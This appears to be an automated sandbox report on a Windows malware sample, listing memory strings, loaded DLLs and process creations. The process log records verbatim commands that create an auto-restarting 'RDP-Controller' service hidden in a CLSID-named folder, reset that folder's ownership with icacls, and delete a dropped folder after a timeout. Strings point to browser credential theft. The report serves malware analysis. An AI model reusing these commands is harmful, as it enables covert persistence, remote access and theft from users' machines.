Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: file.exe, 00000000.00000003.2361745626.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\BFCAAEHJDB.exe "C:\ProgramData\BFCAAEHJDB.exe"
Source: unknown	Process created: C:\ProgramData\BFCAAEHJDB.exe C:\ProgramData\BFCAAEHJDB.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEGIDHDHIDG" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 3212
Source: C:\ProgramData\BFCAAEHJDB.exe	Process created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ZsL2hKzmRChz.acl
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 1524 -ip 1524
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1524 -s 1176
Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\BFCAAEHJDB.exe "C:\ProgramData\BFCAAEHJDB.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEGIDHDHIDG" & exit	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Process created: C:\ProgramData\BFCAAEHJDB.exe C:\ProgramData\BFCAAEHJDB.exe	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Process created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 3212	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 1524 -ip 1524	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1524 -s 1176	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ZsL2hKzmRChz.acl	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

File written: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
